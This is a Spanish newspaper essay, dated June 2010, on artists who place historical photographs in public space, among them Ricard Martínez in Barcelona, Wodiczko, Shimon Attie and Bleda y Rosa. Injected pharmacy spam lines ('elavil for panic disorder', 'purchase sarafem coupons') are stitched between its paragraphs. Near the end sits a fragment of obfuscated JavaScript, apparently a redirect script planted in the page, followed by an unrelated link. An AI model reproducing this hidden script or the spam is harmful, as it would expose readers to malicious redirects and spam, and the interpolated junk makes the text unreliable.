• Noticias maquetadas 14.06.2010

    Imágenes de sombras

    Xavier Antich

    Vayan con cuidado si se acercan a la plaza de la Catedral de Barcelona. Si no les han avisado antes, a lo mejor se llevan un susto de muerte. Cerca de las escaleras de la fachada, en dirección a la Pia Almoina, han plantado una inmensa foto, por suerte en blanco y negro, casi encajada en el preciso lugar en que fue tomada en el verano de 1970, por Carlos Pérez de Rozas. Subidos en un Rolls, el alcalde Porcioles y Franco, de blanco, saludan a las masas fervorosas, exactamente en el mismo sitio en el que ahora estamos nosotros, y a escala 1: 1. Hay otras semejantes por todo el centro de la ciudad, doce en total. Confieso que, aparte de sorprender, crean un cierto desasosiego. Si atendemos al breve texto de Freud en el que definía lo siniestro como aquello que, debiendo permanecer oculto, se ha revelado, bien podría decirse, con justicia y propiedad, que esta inserción de las fotografías en el presente, justo en el lugar en que tuvieron lugar, tienen algo de siniestro. Y de ahí su carácter inquietante.

    Este trabajo de Ricard Martínez viene a continuar otros proyectos suyos. Ya en otoño del 2008, bajo el título de Runa,insertó también en el espacio urbano barcelonés algunas fotografías de los bombardeos de la Guerra Civil. También entonces, superponiendo en el lugar de los acontecimientos, por donde ahora pasa la vida, aquellas fotos, a escala natural, que registraron la irrupción de la muerte y la destrucción. Yel año pasado, aprovechando la exposición de Centelles en el Arts Santa Mònica, Martínez repitió lo mismo con la fotografía de los hermanos Ascaso en la Rambla y con la ya mítica de los guardias de asalto en la calle Diputació. Es lo que Martínez llama «arqueología del punto de vista» y pueden encontrar detalles de su proyecto en el blog de este nombre.

    elavil for panic disorder

    purchase sarafem coupons

    Tal vez sea el artista polaco Krzysztof Wodiczko el exponente más reconocido de esas intervenciones que, a través de la inserción de imágenes en el espacio público, pretenden provocar un cortocircuito en nuestros hábitos perceptivos y en la rutina que anestesia nuestra sensibilidad ante ciertos edificios o espacios públicos. Wodiczko utilizaba la estrategia de las proyecciones de imágenes en la superficie de determinadas construcciones para, como decía él, al modo del psicoanálisis, desenmascarar y revelar el inconsciente reprimido de estas construcciones. Así, cuando todavía duraba el apartheid, proyectó en la embajada londinense de Sudáfrica una esvástica. Yen el todavía Berlín Oriental proyectó sobre la estatua de Lenin la imagen de un indigente que arrastraba sus pertenencias, confundiéndose con aquella. Así, Wodiczko conseguía infiltrarse en el discurso oficial y sabotearlo a través de imágenes que daban a ver lo que esos discursos ocultaban.

    Purchase

    Cuando Shimon Attie viajó a Berlín en el verano de 1991, se estremeció, al pasear por la ciudad, por no encontrar casi rastro de todo aquello que había pasado en la ciudad entre 1933 y 1945. Y se preguntaba a menudo: «¿Dónde están todas las personas que vivieron aquí y que desaparecieron? ¿Qué ha pasado con la cultura y la comunidad judías, que tuvieron aquí su hogar y que se sintieron, durante mucho tiempo, como en casa?». Attie empezó entonces su proyecto Escrito en el muro:una intervención que documentaba los lugares de la comunidad judía, rastreando casa por casa los nombres de las familias y los oficios que tuvieron. Y, paralelamente, documentó también las imágenes de su vida allí. Su proyecto consistió en unas proyecciones nocturnas de fotografías antiguas precisamente en el sitio donde todos ellos habían estado, superponiendo aquel pasado borrado a los lugares de hoy y, así, provocando la emergencia fantasmal de aquella comunidad que el Tercer Reich había extirpado de Berlín. Era a principios de los años noventa, cuando tantas cosas empezaban a cambiar en Berlín, antes de convertirse en la capital del duelo.

    Order

    Los fotógrafos Bleda y Rosa realizaron, a mediados de los noventa, un trabajo extraordinario, Campos de batalla.Con él, se acercaron a ciertos lugares del paisaje español en los que miles de personas murieron hace tiempo de forma violenta, en medio de combates por conquistas territoriales o de luchas contra el supuesto invasor. En sus fotografías de, ahora, apacibles campos de cultivo, yermos pedregales o frondosos bosques, sólo el título de las fotografías («Bailén, 1808», «Calatañazor, en torno al año 1000», «Villalar de los Comuneros, 1521», «Navas de Tolosa, 1212») recordaba aquel pasado abyecto que la naturaleza y la historia casi estaban en trance de olvidar. Bleda y Rosa, de forma muy sutil, convocaban, a modo de contramitos, algunas fechas y acontecimientos señalados en la perversa historiografía mítica de las cruzadas españolas contra el extranjero.

    Son sólo unos ejemplos, pero elocuentes. Tal vez el poder de las imágenes resida también en recordarnos lo que ya no vemos. O, quizá, el carácter fantasmal de ese pasado que una amnesia selectiva quisiera poder olvidar. En su fugacidad, apenas un destello en el imparable curso de la historia y de la vida cotidiana, su aparición nos recuerda todo lo que todavía está ahí. Para quien quiera verlo. El valor de estas imágenes, insertadas con una cierta violencia en nuestro presente, sólo depende de que no pretendan, ellas a su vez, alcanzar a tener la misma solidez de los mitos que desmontan. Walter Benjamin las hubiera llamado «imágenes dialécticas», y su fulgor, hoy, casi nos ciega.

    online

    2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://cuttingedgegardens.com.au/?p=9676

  • Comments are closed.

Calendario de artículos

junio 2010
L M X J V S D
 123456
78910111213
14151617181920
21222324252627
282930  

Artículos anteriores